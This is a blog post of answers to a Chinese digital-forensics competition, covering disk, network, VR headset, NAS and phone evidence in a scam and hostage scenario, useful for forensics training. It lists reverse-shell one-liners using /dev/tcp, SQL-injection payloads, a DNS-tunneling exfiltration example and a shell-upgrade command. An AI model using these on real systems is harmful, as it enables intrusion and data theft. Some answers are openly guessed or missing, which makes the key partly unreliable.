46. [单选题] 参考Ben_Laptop.zip,根据分析及计算后,解密secrectExcel.encrypted所用的key具体值是什么? (3分)

A:b'\xb2T\xc2\xb9\xb7wf9\x95Y\xcc)\xec\xff\x0e\xb6\xf6\x03\x92z\xc6\xe4\x11P\x07@\x94\xbcl\xfd\x95\xc5';
B:b'/T_\r\x1e\xb8\xe6_\xcd\x01\x95\xde\xb8\r\xb3\xb6\\nVp\xeb\xf1S\xb4m\xd6wH\xc4\xc8\xcf\xed';
C:b'\xea\x15\xf9\x05\x85\xe8h\x87\xc4\xf0O\x8a\xba1\x96\x05b\xf9\xa3g\xbaMm\xa4\t,\xe0Q\x87\x8e\xfb\x8c';
D:b'q!\xae2\x1fvo\xb6]\xfb\x1f\x8c\xe5\x18\x03\x0b\xcc\xc93\xf7/us\x8a\x1e;\xd2\xe3\x81\x05\xaa\x04'
from Crypto.Cipher import AES
from Crypto.Protocol.KDF import PBKDF2
from Crypto.Util.Padding import unpad
import os

def decrypt_file(encrypted_file_path, password):
    # 打开加密文件
    with open(encrypted_file_path, 'rb') as f:
        # 读取IV (前16字节)
        iv = f.read(16)
        # 读取salt (接下来的32字节)
        salt = f.read(32)
        # 读取加密数据
        encrypted_data = f.read()

    # 使用密码和salt生成密钥
    key = PBKDF2(password, salt, dkLen=32, count=100000000)

    # 创建AES解密器
    cipher = AES.new(key, AES.MODE_CBC, iv)

    # 解密数据并去除填充
    decrypted_data = unpad(cipher.decrypt(encrypted_data), AES.block_size)

    # 输出解密后的数据
    decrypted_file_path = encrypted_file_path.replace('.encrypted', '.decrypted')
    with open(decrypted_file_path, 'wb') as f_out:
        f_out.write(decrypted_data)

    print(f"File decrypted successfully: {decrypted_file_path}")

if __name__ == "__main__":
    encrypted_file_path = "secretExcel.encrypted"  # 替换为实际的加密文件路径
    password = "iwillnottellyouthepassworduntiligetthemoney"  # 使用正确的密码
    decrypt_file(encrypted_file_path, password)

解密出来

D:\anaconda3\envs\gpupytorch\python.exe E:\2024美亚\aaaa\duqu.py 
b'q!\xae2\x1fvo\xb6]\xfb\x1f\x8c\xe5\x18\x03\x0b\xcc\xc93\xf7/us\x8a\x1e;\xd2\xe3\x81\x05\xaa\x04'
File decrypted successfully: secretExcel.decrypted

D

47. [单选题] 参考Ben_Laptop.zip,解密后的 Excel 文件中,程琳的电话号码是什么? (3分)

A.+852106523728123
B.+852180300901529
C.+60243428690343
D.+63060940949159

image-20241128193905290

A

48. [填空题] 参考Ben_Laptop.zip,解密后的 Excel 文件中,周亮的ID/Passport Number是什么?

(提示:只需使用阿拉伯数字回答) (3分)

image-20241128193936772

510800196504216464

49. [单选题] 根据可能难以破解的加密,你意识到Ben对黑客技术有深入的了解。请回答以下问题,以便了解Ben的运作。

Ben想要有效地搜索信息。他可以使用以下哪个Google高级搜索运算符来搜索某个特定网站? (2分)

A.[related:]
B.[inurl:]
C.[site:]
D.[info:]

[site:] 是 Google 高级搜索运算符,用于在特定网站上搜索内容。你可以通过输入 site:example.com 来只搜索 example.com 网站上的信息。

C

50. [单选题] 参考材料1.pdf,Ben试图入侵一个系统,他尝试在系统中打开HTTP服务器。

使用Python内置的http.server模块启动基本HTTP服务器的命令是什么,以便攻击者从目标机器下载文件? (1分)

A.python3 -m http.server9000
B.python3 -a http.server9000
C.python3 -r http.server9000
D.python3 -m http.server8000

python3 -m http.server 8000 是启动Python内置HTTP服务器的正确命令,默认在端口8000上启动服务器。通过该服务器,攻击者可以通过目标机器下载文件,假设目标机器允许外部访问该端口。

D

51. [单选题] 参考材料2.pdf,Ben准备了几个用于黑客攻击的脚本,这段代码的攻击目的是什么? (4分)

A. 拒绝服务

B. 缓冲区溢出

C. 建立反向 shell

D. 勒索软件

image-20241128194115437

B

52. [单选题] Ben准备了几个用于黑客攻击的脚本。参考材料3.pdf,他采用了什么技术来保护代码? (2分)

A. 拒绝服务

B. 缓冲区溢出

C. 建立反向 shell

D. 勒索软件

图片

B

53. [单选题] 参考材料4.pdf,他利用了什么方法来获取反弹shell(Reverse shell)? (2分)

A.中间人攻击

B.暴力破解

C.缓冲区溢出

D.文件上传

图片

D

54. [单选题] 参考1.pcap,Ben使用了哪些命令来扫描目标机器(提示:Ubuntu)?

i) arp-scan -l
ii) nmap -p1-65535 -sV -sC -O
iii) nmap -Sx
iv) nmap -sS (4分)

A. i&ii

B. ii&iii

C. i&iv

D.以上皆是

先第三个是无效命令 所以BCD都不选

同时也在流量包1中找到大量arp的包 所以可能使用了命令1来扫描目标机器

A

55. [单选题] 参考2.pcap,第56号数据包的代码功能是什么? (4分)

A.清除记录

B.拒绝服务

C.测试注入漏洞

D.反向外殼 (Reverse Shell)

图片

D

56. [填空题] 参考1.pcap,当Ben成功进入目标系统时,攻击者获取的账户?

(答案格式:请使用小写英文字母作答) (4分)

这个题的意思是进入系统了!

ip.src==192.168.91.145 && ip.dst == 192.168.91.143 && tcp contains "whoami"

image-20241129112245003

root;admin;pwd;whoami;cat;passwd;shadow;sudo;ls;echo

root

57. [单选题] Ben正在尝试入侵一个系统,并且他正在进行开源研究,他发现 nc -lvp 9000 将被用来连接到反弹shell (Reverse Shell),Ben将使用什么命令来创建反弹shell (Reverse Shell)?

i) 0<&196;exec 196<>/dev/tcp/10.10.10.10/9000;sh <&196 >&196 2>&196
ii) exec 5<>/dev/tcp/10.10.10.10/9000;cat <&5 | while read line; do $line 2>&5 >&5; done
iii) /bin/bash -i >& /dev/tcp/192.168.217.139/4444 0>&1
iv) sh -i 5<> /dev/tcp/10.10.10.10/9000 0<&5 1>&5 2>&5 (4分)

D

58. [填空题] 参考材料5.pdf,Ben输入了“find / -perm -4000 2>/dev/null”后,显示了材料5.pdf的內容,這些內容所显示的内容除具有执行权限,还设置了什么?

(答案格式:请以大写英文字母作答输入答案) (4分)

SUID提权

图片

SUID

59. [单选题] Ben发现了下面的命令import pty; pty.spawn(“/bin/bash"),它的功能是? (4分)

A. 在shell中导入Python函数

B. 允许shell执行Python命令

C. 获取比www-data用户更高权限的交互式shell

D. 以上皆不是

C

60. [填空题] 你注意到Ben的笔记本电脑上安装了暗网 Tor,请回答以下问题。

Ben应该输入什么命令来在 Kali Linux 中执行 Tor 浏览器?
(答案格式:小写英文字母和符号'-'混合作答,例如:abc-def) (4分)

仿真,打开kali虚拟机,输入tor按tab

image-20241128200506080

torbrowser-launcher

61. [单选题] 参考Ben_Laptop.zip,Ben经常使用 Tor 浏览器,该 Tor 浏览器把多少个 .onion 链接添加为书签? (2分)

在Tor浏览器中查看书签工具列,4个.onion链接是Ben后来添加的

时间一样的是系统自带的

image-20241128201051123

4

62. [单选题] 在检查Ben的记录时,发现了Port 9151的连接,那是指Ben在使用什么浏览器? (2分)

Port 9151 是 Tor 浏览器的默认控制端口,通常用于与 Tor 网络进行通信和配置。因此,如果在 Ben 的记录中发现连接到 Port 9151,说明 Ben 使用的是 Tor 浏览器

tor

63. [判断题] 参考材料6.pdf,应该保持默认设置,以便 Firefox 浏览器使用 Tor 网络? (2分)

材料6中显示正使用proxychains代理工具走127.0.0.1:9050上网

图片

查看代理配置文件/etc/proxychains4.conf,配置了socks4代理

图片

查看tor的socks代理配置文件,代理的端口是本地的9050,材料中的设置没有问题

图片

正确

64. [单选题] 参考Ben_Laptop.zip,Ben使用 OpenVPN 5.196.64.231 多少天?

(答案格式:只需使用阿拉伯数字回答) (2分)

在Ben用户的桌面有一个OpenVPN.log日志

image-20241128201947973

2

65. [填空题] 参考Ben_Laptop.zip,他使用了哪种算法加密密码?

(答案格式:大写英文字母和符号'-' 混合组成) (2分)

查看openvpn的配置文件config.json

Ben.e01/Windows/Users/Ben/AppData/Roaming/OpenVPN Connect
AES-256-GCM

66. [单选题] 在2024年8月16日17:40:06,发生了什么?

i) 无法在套接字(socket)上执行操作
ii) 系统缺乏足够的缓冲区空间
iii) 队列(queue)已满。
(提示: 1)套接字是用于网络通信的编程接口,允许程序在网络上发送和接收数据, 2) 队列已满是程序试图将更多的元素插入到一个已经达到容量上限的队列中) (2分)

A. i&ii

B. ii & iii

C.i&ii

D.以上皆是

image-20241128202928307

D

67. [单选题] 调查员把一只属于Ben的U盘和一张SD卡交给了你进行分析。

参考Ben_USB.e01,是什么导致了“满汉全席.jpg”和“满汉全席Secret.jpg”之间的大小差异? (2分)

满汉全席Secret.jpg中隐藏了一个word文档,使用foremost可以分离出来

图片

68. [填空题] 参考BenSDCard.e01,Ben的SD卡的解密密码是? (2分)

lamRich123!

69. [填空题] 参考Ben_Laptop.zip,在2024/08/23 14:54:59 UTC+8,Ben 浏览了哪个网站?

(答案格式: "https://xxxxxx.com/") (1分)

image-20241128203619074

https://teamviewer_internal/

70. [填空题] 参考Ben_Laptop.zip,Ben 浏览上一题所述的网站时连接到他的计算机的 Wi-Fi MAC 地址是?

(答案格式:"A1:B2:C3:D4:E5:F6") (1分)

image-20241128203754390

90:61:AE:C0:90:C2

71. [单选题] 参考Ben_Laptop.zip和Ben_Jumpstation.zip,回答以下问题:

Ben的计算机使用下列哪款远程桌面软件访问了Ben的跳转站(Jumpstation)?
i:向日葵远程控制
ii:AnyDesk
iii:TeamViewer (2分)

A. i&ii

B. ii&iii

C. 只有iii

D. 只有ii

image-20241128204938440

C

72. [填空题] 参考Ben_Jumpstation.zip,Ben的跳转站 (Jumpstation)IP 地址和子网掩码(Subnet mask)是什么?

(答案格式:192.168.1.1/28) (1分)

image-20241128205040884

192.168.182.128/24

73. [填空题] 参考Ben_Jumpstation.zip,在Ben的跳转站(Jumpstation)上,该远程桌面软件中的访问ID是什么?

(答案格式:请用阿拉伯数字作答) (2分)

image-20241128205437006

687062512

74. [填空题] 参考Ben_Jumpstation.zip,Alice何时从跳转站(Jumpstation)下载了文件?(请以UTC+8回答)

(答案格式:YYYY-MM-DD HH:MM:SS) (2分)

image-20241128205721076
705716888
701659933
702954756

批量搜存在位置

在TeamViewer的日志TeamViewer15_Logfile.log

image-20241128210358329

去查看

image-20241128205620658

中可以看到在Alice连接之后曾经下载过C:\Users\ben\Desktop\Personal Data\Personal_details_2.xlsx

image-20241128210218679

日志的时区是UTC-7,换算成UTC+8需要加15个小时

image-20241128210257501

2024-08-23 17:31:55

75. [单选题] 参考Ben_Jumpstation.zip,有多少个访问ID连接过跳转站 (Jumpstation)? (2分)

image-20241128210504579

5

76. [单选题] 您正在检查来自 Web 应用程序防火墙的 HTTP流量日志,并注意到以下日志条目:

[2023-10-15 11:45:12] "GET /search?q=%27%3B+SHUTDOWN+-- HTTP/1.1" 500
[2023-10-15 11:45:15] "GET /search?q=%27+UNION+SELECT+password+FROM+users+-- HTTP/1.1" 200
[2023-10-15 11:45:18] "GET /search?q=%27+OR+1%3D1+-- HTTP/1.1" 200
根据这些日志条目,下列哪项陈述正确识别了攻击的类型和目标组件?
i. 正在尝试 SQL 注入攻击。
ii. 攻击者瞄准的是 Web 应用程序的数据库。
iii. 正在执行跨站点脚本 (XSS)攻击。
iv. 正在瞄准 Web 服务器的操作系统。 (2分)

A. i&ii

常识题

77. [单选题] 在对网络日志进行取证分析时,您发现内部主机向可疑網域发出了不寻常的 DNS 查询

Timestamp:2024-09-23 12:00:00
Query:dGhpc3Bj.susdomain.com
Type:TXT
Timestamp:2024-09-23 12:05:00
Query:cGFzc3dvcmRpcw==.susdomain.com
Type:TXT
Timestamp:2024-09-23 12:10:00
Query:TWVpeWEyMDI0.susdomain.com
Type:TXT
结果顯示包含大量 base64 编码数据,攻击者使用了什么技术? (2分)

A. 域生成算法(DGA)用于C2通信

B. 快速通量DNS用于隐藏恶意服务器

C. DNS缓存投毒用于复位向流量

D. DNS隧道用于数据泄露

D. DNS隧道用于数据泄露

78. [单选题] 在检查内部客户端和外部服务器之间的捕获包,您注意到以下Transport Layer Security (TLS) 握手消息:

Client Hello:
Supported Versions:TLS 1.0, TLS 1.1, TLS 1.2
Cipher Suites:TLS_RSA_WITH_3DES_EDE_CBC_SHA, TLS_RSA_WITH_RC4_128_SHA
Server Hello:
Selected Version:TLS 1.0
Cipher Suite:TLS_RSA_WITH_RC4_128_SHA
鉴于客户端和服务器都支持更高版本的 TLS 和更强的加密套件,下列哪些是降级的合理解释?
i. 中间人攻击导致协议降级。
ii. 错误配置导致回退到较弱的加密方式。
iii. 由于客户端与服务器的兼容性问题,属于正常操作。 (2分)

A. i&ii

B. 只有ii

C. 只有i

D. 以上皆是

A

79. [单选题] 參考以下HTTP访问日誌片段:

192.168.1.1 - - [12/Oct/2023:14:55:36 +0000] "GET /index.html HTTP/1.1" 200 1024
192.168.1.15 - - [12/Oct/2023:14:56:10 +0000] "POST /login.php HTTP/1.1" 200 512
192.168.1.10 - - [12/Oct/2023:14:57:01 +0000] "GET /admin/dashboarD:php HTTP/1.1" 403 256
192.168.1.20 - - [12/Oct/2023:14:58:25 +0000] "GET /index.html HTTP/1.1" 200 1024
哪个IP地址试图访问受限页面? (2分)

A. 192.168.1.15

B. 192.168.1.10

C. 192.168.1.20

D. 192.168.1.1

B

80. [单选题] 參考以下网络数据包捕获的十六进制部分:

0000 00 1a a0 b0 c0 d0 00 1b c1 d1 e1 f1 08 00 45 00
0010 00 3c 1c 46 40 00 40 06 a6 ec c0 a8 01 0a c0 a8
0020 01 14 00 50 d1 5c 1a 2b 3c 4d 5e 6f 70 80 90 a0
0030 b0 c0 d0 e0 f0 00 00 00 00 50 02 20 00 b5 e2 00
数据包的源IP地址是什么? (2分)

A. 192.168.1.10

81. [单选题] 题目见描述(81) (2分)

參考以下Wireshark捕获摘要:

No. Time Source Destination Protocol Length Info

1 0.000000 192.168.1.10 192.168.1.255 ARP 42 Who has 192.168.1.255? Tell 192.168.1.10

2 0.005000 192.168.1.20 192.168.1.10 ICMP 98 Echo (ping) request

3 0.010000 192.168.1.10 192.168.1.20 ICMP 98 Echo (ping) reply

4 0.020000 192.168.1.30 192.168.1.10 TCP 66 12345 > 80 [SYN] Seq=0 Win=64240 MSS=1460

5 0.025000 192.168.1.10 192.168.1.30 TCP 66 80 > 12345 [SYN, ACK] Seq=0 Ack=1 Win=64240 MSS=1460

6 0.030000 192.168.1.30 192.168.1.10 TCP 54 12345 > 80 [ACK] Seq=1 Ack=1 Win=64240

描述此捕获中发生的事件顺序。

A. Ping请求后发送ARP请求

B. ARP请求、Ping交换和TCP握手

C. TCP握手后发送ARP请求

D. 仅存在ICMP流量

B

82. [单选题] 题目见描述(82) (2分)

參考服务器上netstat命令的以下输出:

Active Internet connections (servers and established)

Proto Recv-Q Send-Q Local Address Foreign Address State

tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN

tcp 0 0 192.168.1.10:22 203.0.113.20:54321 ESTABLISHED

tcp 0 0 192.168.1.10:80 198.51.100.5:12345 ESTABLISHED

tcp 0 0 192.168.1.10:443 203.0.113.25:23456 ESTABLISHED

哪些服务当前正在服务器上运行并监听?

A. 在80端口上的SSH和54321端口上的HTTP

B. 仅在22端口上的SSH

C. 在22端口上的SSH,12345端口上的HTTP,以及443端口上的HTTPS

D. 仅在23456端口上的HTTPS

B

83. [单选题] 参考以下电子邮件头信息:

From:"John Doe" john.doe@example.com
To:"Jane Smith" jane.smith@company.com
Date:Thu, 12 Oct 2023 19:00:00 +0000
Subject:Important Update
Received:from unknown (HELO mail.example.com) (192.0.2.10)
by mail.company.com with SMTP; Thu, 12 Oct 2023 19:00:05 +0000
X-Mailer:PHPMailer 5.2
识别可能表明电子邮件被伪造的任何异常。 (2分)

A. 使用了PHPMailer 5.2

B. 电子邮件头部显示未知发件人

C. 电子邮件在19:00:00发送,但在19:00:05接收

D. 主题是"重要更新"

B. 电子邮件头部显示未知发件人

84. [单选题] 在网络取证中,您会检查TCP/IP数据包中的哪个字段来验证数据在传输过程中是否受到了破坏? (1分)

A. TCP序列号

B. 数据包大小

C. 校验和(Checksum)

D. 目标端口

C. 校验和(Checksum)

85. [单选题] 以下哪个特征最能表明僵尸网络中的指挥与控制(C2)通信? (1分)

A. 高频率的DNS查询到热门域名

B. 数据包传至255.255.255.255

C. 与远程服务器进行定期周期性通信

D. 使用FTP协议进行过多的文件传输请求

C. 与远程服务器进行定期周期性通信

86. [单选题] 在IP封包分析中,哪一個數值最能夠協助推斷封包經過的距離? (1分)

A. 由于路由无响应导致的数据包丢失增加

B. IP封包中的TTL值

C. ICMP回显回复中不匹配的序列号

D. 路由器级别检查IP选项字段的异常

B. IP封包中的TTL值

87. [单选题] 通过从跳转站获得的信息(Ben_Jumpstation.zip),你认为Alice的笔记本电脑可能包含与犯罪相关的更多信息。你建议调查员进一步扣押Alice的笔记本电脑进行分析。

参考Alice_Macbook.e01,计算机名称是? (1分)

image-20241128211515956

Alice’s MacBook Pro

88. [填空题] 参考Alice_Macbook.e01,Alice的计算机运行的macOS Monterey版本是?

(答案格式:123.456.789) (1分)

image-20241128211821968

12.7.6

89. [填空题] 参考Alice_Macbook.e01,Alice的计算机的EN0 MAC地址是?

(答案格式: xx:xx:xx:xx:xx:xx, 小写英文字母和阿拉伯数字混合组成) (1分)

image-20241128211904473

F4-5C-89-A1-C0-07

90. [填空题] 参考Alice_Macbook.e01,Alice在2024年8月19日收到了一个包含15个人个人资料的Excel文件,她是从哪一个平台下载这个文件的?

(答案格式: 请用小写英文作答 (无须留空白位),例如:facebook) (2分)

顺着路径找:

image-20241128212117823

image-20241128212203796

该文件是John于2024-08-19 12:51:09在WhatsApp群聊三五成群中发的

WhatsApp

91. [填空题] 承上题,参考Alice_Macbook.e01,Alice是何时在她的Mac上安装了上述应用程序?

(答案格式:YYYY-MM-DD HH:MM) (2分)

image-20241128212749381

2024-08-19 10:03

92. [填空题] 参考Alice_Macbook.e01,Alice在2024年8月19日在计算机上截取了两张屏幕截图,都是关于安置客服人员的电骗中心位置,她是使用哪个浏览器来搜索这个位置? (1分)

image-20241128222359850

image-20241128222415157

safari

93. [填空题] 参考Alice_Macbook.e01,她的计算机的Team Viewer ClientID是多少?

(答案格式:只需使用阿拉伯数字回答) (1分)

image-20241128222529845

358639376

*94. [单选题] 参考Alice_Macbook.e01,Alice曾经登录Teamviewer并获取一个包含个人数据的excel文件,Alice是透过以下哪一个方法登录Teamviewer以获取该文件? (2分)

A.Teamviewer Desktop Application

B.web.teamviewer.com

C.Anydesk

D.以上皆不是

下载位置是浏览器默认位置

image-20241128223631716

有很多例子

对面的ID为中转站的ID,传输时间与下文相一致

image-20241128223826956

B

95. [单选题] 承上题,上述包含个人数据文件的文件名是? (2分)

A. newfile.xlsx

B. personal_data.xlsx

C. Personal_details_2.xlsx

D. Kingsoft_Et_Stocka.xlsx

找日志文件

image-20241128223106710

image-20241128223218160

传过Alice

Personal_details_2.xlsx

96. [填空题] 承上题,参考Alice_Macbook.e01,Alice是何时通过Teamviewer 获取上述包含个人资料的文件的?

(答案格式:YYYY-MM-DD HH:MM) (2分)

上一题图+15小时

2024-08-23 17:31

97. [填空题] 参考Alice_Macbook.e01,Alice透过Teamviewer连接另一台计算机以获取文件的Teamviewer ID是多少?

(答案格式:只需使用阿拉伯数字回答) (2分)

687062512

98. [填空题] 同样,跳转站(Ben_Jumpstation.zip)也指向一些可能从John的桌面计算机获取的关键信息。参考John_Desktop.e01, 系统最后关机时间是?

(答案格式:YYYY-MM-DD HH:MM:SS) (2分)
image-20241128225124647

2024-08-20 17:40:05

99. [单选题] 参考John_Desktop.E01, 系统连接USB SanDisk 3.2Gen 1, 其序列号是? (2分)

A.01010de54f417fee2292cb6b6ed760608009cace6e76a

B.D9644B9861A106C9DB4FD4599863C856C6789384B

C.4f7b6f8fc20f74329994f7d3fac6920a8d0ecd33fabad423

D.8fe24bf440f2def1c5182e1a27a4c183f5d6024b758c803

image-20241128225157015

A

100. [判断题] 参考John_Desktop.e01, 于2024年8月28日13时57分21, John曾连接过Meta Quest 3吗? (2分)

image-20241128225406411

正确

101. [填空题] 参考John_Desktop.E01, John在何时打开了Joshe investment.JPG文件?

(答案格式:YYYY-MM-DD HH:MM:SS) (2分)

图片

2024-08-01 16:13:08

102. [填空题] 参考John_Desktop.e01, 用户 "DESKTOP-HDKJIJJ" 的安全标识符(SID)是?

(答案格式:大写英文字母,阿拉伯数字和符号'-' 混合组成) (2分)

image-20241128225636450

S-1-5-21-938709476-2694722248-4044499888-1001

103. [单选题] 参考John_Desktop.e01, 有多少个用户帐户是停用(disabled)? (2分)

A. 1

B. 2

C. 3

D. 5

image-20241128225747943

大于3,猜是5

5

104. [填空题] 参考John_Desktop.E01, 该计算机被动态主机配置协议(DHCP) 所分配的IP位址是?

(答案格式:123.123.123.123) (2分)

图片

172.20.10.2

105. [单选题] 参考John_Desktop.E01, DF_2024_08_29_10_01_27_906.mp4 是什么类型的视频? (2分)

A. 自我介绍

B. 产品锁售

C. 深伪视频

D. 足球比赛

图片

C

106. [单选题] 在搜查John住所期间,调查员检取了一副虛疑實景 (VR) 眼鏡进行了取证检查。参考Quest_3_2G0YC5ZFB307D7.zip 文件,虛疑實景 (VR) 眼鏡有多少个使用者? (3分)

A. 1

B. 2

C. 3

D. 4

用户列表文件1人

107. [单选题] 参考Quest_3_2G0YC5ZFB307D7.zip,VR 眼鏡默认安装了什么即时通讯软件 (Instant Messaging App)? (3分)

A. WeChat

B. LINE

C. WhatsApp

D. Telegram

C. WhatsApp

108. [填空题] 参考Quest_3_2G0YC5ZFB307D7.zip, 虛疑實景 (VR) 眼鏡应用程序"Gun Raiders"的版本是?

(答案格式:1.2.3) (2分)

10.6.5

在dumpstar.txt中搜索GunRaiders

109. [判断题] 参考Quest_3_2G0YC5ZFB307D7.zip,VR 眼镜应用程序"Gun Raiders",可以启动设备发现或操纵蓝牙 (2分)

图片

正确

110. [填空题] 参考Quest_3_2G0YC5ZFB307D7.zip,在DCIM 文件夹内,VR 眼镜有多少视频的文件修改时间是2024年8月13日?

(答案格式:请以阿拉伯数字作答) (2分)

图片

3

111. [填空题] 参考Quest_3_2G0YC5ZFB307D7.zip,在提供的网络信息中,虛疑實景 (VR) 眼鏡'wlan0' 网络接口的 IPv4 地址是?

(答案格式:123.123.123.123) (2分)

图片

192.168.1.142

112. [单选题] 除了以上John的所有设备之外,调查员还发现了一台NAS存储设备,并转交你进行分析。参考 John_NAS_1.E01 和 John_NAS_2.E01,它是哪一种独立磁盘冗余阵列 (RAID)? (2分)

使用FTK挂载两个镜像

image-20241128230232933

RAID 0

113. [判断题] 参考 John_NAS_1.E01 和 John_NAS_2.E01,该NAS的容量有512GB (2分)

image-20241128230317613

不到512GB

114. [单选题] 参考 John_NAS_1.E01 和 John_NAS_2.E01,该NAS的可用空间有多少? (3分)

A. 512GB

B. 426GB

C. 417GB

D. 9.4GB

需要挂载起来看!

C

115. [判断题] 参考 John_NAS_1.E01 和 John_NAS_2.E01,该NAS 的文件系统格式是EXT3 (2分)

image-20241128232938721

116. [单选题] 参考 John_NAS_1.E01 和 John_NAS_2.E01,该NAS 的用户人数有多少个? (2分)

image-20241128233638669

只有admin和johnkiller用户目录下有文件记录,所以只有2个在使用NAS的用户

2

117. [单选题] 参考 John_NAS_1.E01 和 John_NAS_2.E01,该 NAS 内有多少张圖片标示 'This is a Child PORN PHOTO' ? (2分)

注意大小写

image-20241128233715078

1

118. [填空题] 参考 John_NAS_1.E01 和 John_NAS_2.E01,视频 ING_VID_8081695_10s.mp4 在什么时候放进 NAS 内?

(答案格式:YYYY-MM-DD HH:MM:SS) (3分)

图片

2024-08-08 10:59:40

119. [填空题] 参考 John_NAS_1.E01 和 John_NAS_2.E01,dcdb711a52a94fe9b6eb742a6919410D.mp4是在哪个网站下载的?

(答案格式:www.abcd.com) (3分)

去join的计算机里看:dcdb711a52a94fe9b6eb742a6919410D.mp4

image-20241128233933470

图片

120. [填空题] 参考John_Desktop.E01,John 访问NAS的网络地址是?

(答案格式:123.123.123.123) (2分)

图片

169.254.43.127

121. [单选题] 参考John_Desktop.E01, 该 NAS 的网络驱动器盘符(Network Drive Letter)是? (2分)

图片

Z

122. [判断题] 参考John_Desktop.E01, John_NAS_1.E01 和 John_NAS_2.E01, 当中的v文件夹内的视频及照片数量是相同的? (2分)

正确

123. [填空题] 参考 John_NAS_1.E01 和 John_NAS_2.E01,该NAS的a文件夹中, "1.jpeg" 是由哪个网站生成?

(答案格式: abcd.com) (2分)

图片

poe.com

124. [填空题] 参考 John_NAS_1.E01 和 John_NAS_2.E01,该NAS的c文件夹中, 有一个被删除了的照片, 它的名称是什么?

(答案格式:小写英文字母,阿拉伯数字和符号'-' 混合组成, 例如: 123-abcf-456.jpg) (2分)

image-20241128235056659

203533-17158629334c7d.jpg

125. [填空题] 根据你以上的发现,你直觉认为有无辜的人被雇为所谓的客服人员,他们的安全仍然存在疑虑。你决定再次查看Alice的手机镜像以确认你的推测。参考Alice_Mobile.bin,于2024年8月16日,Alice使用外送程序 "Foodpanda" 于哪间店铺点餐?

(答案格式:大写英文字母,例如: GOODCAFE(CENTRAL)) (3分)

image-20241128235715588

image-20241128235924378

image-20241129000010370

MILKCAFE(FAIRVIEWPARK)

126. [单选题] 参考Alice_Mobile.bin,于2024年8月30日,Alice使用外送程序 "Foodpanda" 点餐用了哪种方式付款? (2分)

A. 微信支付

B. PayMe

C. 支付宝

D. 现金

E. 信用卡

image-20241129000129235

[{"a":"hsbc_payme","b":"PayMe from HSBC","c":81.1}]

PayMe

127. [填空题] 参考Alice_Mobile.bin,Alice最后使用外卖程序 "Foodpanda" 的日期?

(答案格式:YYYY-MM-DD) (2分)

直接查看Foodpanda应用数据库目录中文件的最后修改时间

image-20241129000222988

2024-09-02

128.[单选题]参考Alice_Mobile.bin,Alice要求安排"客务人员"逃到哪里?(2分)

A. 埃及

B. 阿根廷

C. 巴西

D. 哥伦比亚

E. 南非

手机中在Line上与船夫的聊天记录

image-20241129000335498

E

129.[单选题]参考Alice_Mobile.bin,Alice曾经向“客服人员”发送一张照片,指出上船地点的位置,拍摄这张照片的GPS经纬值是什么?(2分)

A. 22.474444444444,114.039722222222

B. 22.473611111111,114.042777777778

C. 22.475277777778,114.038888888889

D. 22.475000000007,114.035833333333

E. 22.476388888889,114.036388888889

image-20241129000351334

去相册找原图

image-20241129000719580

image-20241129000841053图片

B

130.[单选题]参考Alice_Mobile.bin,根据多媒体文件的分析,于2024年8月16日,Alice曾到哪里进行拍摄?凭着你及团队的机智及专业知识,成功锁定犯罪团伙禁锢人质的位置。行动单位根据你的讯息,迅速展开拯救行动,赶在被押离港前成功救出人质。(2分)

A. 旺角

B. 沙田

C. 黄大仙

D. 大生围

E. 天水围

image-20241129001314522

D

posted @ 2026-05-27 10:26  Cava1i  阅读(20)  评论(0)    收藏  举报